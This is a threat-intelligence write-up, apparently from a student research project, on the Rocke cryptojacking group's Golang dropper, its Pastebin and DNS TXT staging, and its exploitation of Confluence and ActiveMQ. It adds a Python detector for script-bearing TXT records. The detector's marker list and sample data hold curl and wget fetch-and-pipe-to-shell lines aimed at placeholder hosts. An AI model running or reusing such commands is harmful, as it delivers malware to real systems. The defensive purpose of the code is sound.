Rocke: The Chinese-speaking cybercrime group dubbed Rocke has been active since early 2018 and has carried out a series of crypto-jacking schemes. In March 2019, according to Anomali Labs, the group began using a Golang-based dropper dubbed LSD that used Pastebin for its command-and-control (C2) servers. The new malware let the group set up Monero (XMR) crypto-jacking operations while going almost entirely undetected by anti-virus products, a far lower detection rate than the group's earlier tools written in Python had achieved. A month after the Pastebin C2 servers were discovered, the group began exploiting CVE-2019-3396 in vulnerable Confluence servers for remote code execution, which allowed it to drop crypto-miner payloads onto those servers. In July, Rocke switched from Pastebin to self-hosted C2 servers, taking its crypto-mining scripts out of the public eye and reducing the chance of the servers being taken down. In September the group shifted to storing its crypto-mining scripts in Domain Name System (DNS) TXT records instead of Pastebin pastes. Alongside these changes, the group also began using a different vulnerability, CVE-2016-03088, an exploit against ActiveMQ servers.
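Added example, not code from the original report or from Binary Defense: a small Python check a defender could run over exported DNS TXT answers to flag records that carry a shell script, either in plain text or base64-wrapped and split across TXT chunks, which is the staging pattern described above. The record names, hosts, marker list and printable-text threshold are constructed assumptions, not indicators from the report.

```python
import base64
import binascii
import re
from typing import Optional

# Markers that a TXT payload is a script rather than SPF/DMARC/verification data (assumed list).
SCRIPT_MARKERS = re.compile(
    r"^#!/|\b(curl|wget|chmod|crontab|nohup|base64 -d)\b|\b(xmrig|stratum\+tcp|minerd)\b",
    re.IGNORECASE | re.MULTILINE,
)

# TXT prefixes expected in ordinary zones; skipped to keep the check quiet.
BENIGN_PREFIXES = ("v=spf1", "v=dmarc1", "v=dkim1", "google-site-verification=")


def decode_if_base64(value: str) -> Optional[str]:
    """Return decoded text if value is valid base64 that decodes to mostly printable text."""
    compact = "".join(value.split())  # long payloads arrive as several 255-byte TXT chunks
    if len(compact) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=]+", compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    printable = sum(ch.isprintable() or ch in "\n\t" for ch in text)
    return text if printable / max(len(text), 1) > 0.9 else None


def inspect_txt(value: str) -> dict:
    """Classify one TXT string as benign, a plain-text script, or a base64-wrapped script."""
    if value.strip().lower().startswith(BENIGN_PREFIXES):
        return {"suspicious": False, "reason": "known benign prefix"}
    decoded = decode_if_base64(value)
    if decoded is not None and SCRIPT_MARKERS.search(decoded):
        return {"suspicious": True, "reason": "base64-wrapped script", "preview": decoded[:60]}
    if SCRIPT_MARKERS.search(value):
        return {"suspicious": True, "reason": "plain-text script", "preview": value[:60]}
    return {"suspicious": False, "reason": "no script markers"}


def scan_records(records):
    """Return the names whose TXT content looks like a staged script."""
    return [name for name, value in records if inspect_txt(value)["suspicious"]]


def sample_records():
    """Constructed (name, TXT string) pairs modelled on a DNS log export; not real indicators."""
    staged = base64.b64encode(b"#!/bin/sh\ncurl -fsSL http://payload.invalid/x.sh | sh\n").decode()
    return [
        ("example.com", "v=spf1 include:_spf.example.com -all"),
        ("_dmarc.example.com", "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"),
        ("t1.stage.invalid", staged[:40] + " " + staged[40:]),  # delivered as two TXT chunks
        ("t2.stage.invalid", "#!/bin/bash\nwget -q -O - http://host.invalid/m.sh | bash"),
        ("note.example.com", base64.b64encode(b"build=2024.1;owner=inventory-team").decode()),
    ]
```

Run against a real TXT export, the benign-prefix list and marker list will need tuning to the zones you actually serve.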
By Akshay Rohatgi and Randy Pargman

About this Student Research Project

Binary Defense’s mission is